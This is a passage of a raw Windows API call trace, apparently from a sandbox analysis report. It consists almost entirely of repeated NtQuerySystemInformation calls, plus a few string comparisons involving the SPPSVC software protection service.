(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe760, Length=0x28, ResultLength=0x0) [0210.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe840, Length=0x38, ResultLength=0x0) [0210.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x20, ResultLength=0x0) [0210.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe640, Length=0x20, ResultLength=0x0) [0210.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe640, Length=0x20, ResultLength=0x0) [0210.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe640, Length=0x20, ResultLength=0x0) [0210.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe840, Length=0x38, ResultLength=0x0) [0210.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x20, ResultLength=0x0) [0210.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe650, Length=0x20, ResultLength=0x0) [0210.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe650, Length=0x20, ResultLength=0x0) [0210.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe910, Length=0x50, ResultLength=0x0) [0210.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe890, Length=0x28, ResultLength=0x0) [0210.198] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0210.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe910, Length=0x50, ResultLength=0x0) [0210.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe910, Length=0x50, ResultLength=0x0) [0210.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe910, Length=0x50, ResultLength=0x0) [0210.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe840, Length=0x38, ResultLength=0x0) [0210.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe670, Length=0x28, ResultLength=0x0) [0210.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe670, Length=0x28, ResultLength=0x0) [0210.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe670, Length=0x28, ResultLength=0x0) [0210.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6e0, Length=0x28, ResultLength=0x0) [0210.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe840, Length=0x38, ResultLength=0x0) [0210.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe760, Length=0x28, ResultLength=0x0) [0210.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe760, Length=0x28, ResultLength=0x0) [0210.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe840, Length=0x38, ResultLength=0x0) [0210.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x20, ResultLength=0x0) [0210.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe640, Length=0x20, ResultLength=0x0) [0210.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe640, Length=0x20, ResultLength=0x0) [0210.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe640, Length=0x20, ResultLength=0x0) [0210.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe840, Length=0x38, ResultLength=0x0) [0210.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x20, ResultLength=0x0) [0210.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe650, Length=0x20, ResultLength=0x0) [0210.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe650, Length=0x20, ResultLength=0x0) [0210.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeb60, Length=0x40, ResultLength=0x0) [0210.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeb60, Length=0x40, ResultLength=0x0) [0210.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeac0, Length=0x40, ResultLength=0x0) [0210.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeac0, Length=0x40, ResultLength=0x0) [0210.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe9e0, Length=0x30, ResultLength=0x0) [0210.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe9e0, Length=0x30, ResultLength=0x0) [0210.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8e8, Length=0x30, ResultLength=0x0) [0210.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe850, Length=0x38, ResultLength=0x0) [0210.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x50, ResultLength=0x0) [0210.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe640, Length=0x28, ResultLength=0x0) [0210.217] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0210.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x50, ResultLength=0x0) [0210.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x50, ResultLength=0x0) [0210.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x50, ResultLength=0x0) [0210.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x38, ResultLength=0x0) [0210.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe420, Length=0x28, ResultLength=0x0) [0210.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe420, Length=0x28, ResultLength=0x0) [0210.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe420, Length=0x28, ResultLength=0x0) [0210.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe490, Length=0x28, ResultLength=0x0) [0210.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x38, ResultLength=0x0) [0210.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe510, Length=0x28, ResultLength=0x0) [0210.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe510, Length=0x28, ResultLength=0x0) [0210.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x38, ResultLength=0x0) [0210.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe470, Length=0x20, ResultLength=0x0) [0210.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe3f0, Length=0x20, ResultLength=0x0) [0210.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe3f0, Length=0x20, ResultLength=0x0) [0210.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe3f0, Length=0x20, ResultLength=0x0) [0210.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x38, ResultLength=0x0) [0210.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe470, Length=0x20, ResultLength=0x0) [0210.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe400, Length=0x20, ResultLength=0x0) [0210.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe400, Length=0x20, ResultLength=0x0) [0210.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x50, ResultLength=0x0) [0210.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe640, Length=0x28, ResultLength=0x0) [0210.229] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0210.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x50, ResultLength=0x0) [0210.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x50, ResultLength=0x0) [0210.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x50, ResultLength=0x0) [0210.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x38, ResultLength=0x0) [0210.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe420, Length=0x28, ResultLength=0x0) [0210.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe420, Length=0x28, ResultLength=0x0) [0210.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe420, Length=0x28, ResultLength=0x0) [0210.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe490, Length=0x28, ResultLength=0x0) [0210.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x38, ResultLength=0x0) [0210.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe510, Length=0x28, ResultLength=0x0) [0210.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe510, Length=0x28, ResultLength=0x0) [0210.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x38, ResultLength=0x0) [0210.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe470, Length=0x20, ResultLength=0x0) [0210.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe3f0, Length=0x20, ResultLength=0x0) [0210.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe3f0, Length=0x20, ResultLength=0x0) [0210.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe3f0, Length=0x20, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x38, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe470, Length=0x20, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe400, Length=0x20, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe400, Length=0x20, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfec00, Length=0x20, ResultLength=0x0) [0210.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe980, Length=0x50, ResultLength=0x0) [0210.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe980, Length=0x50, ResultLength=0x0) [0210.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 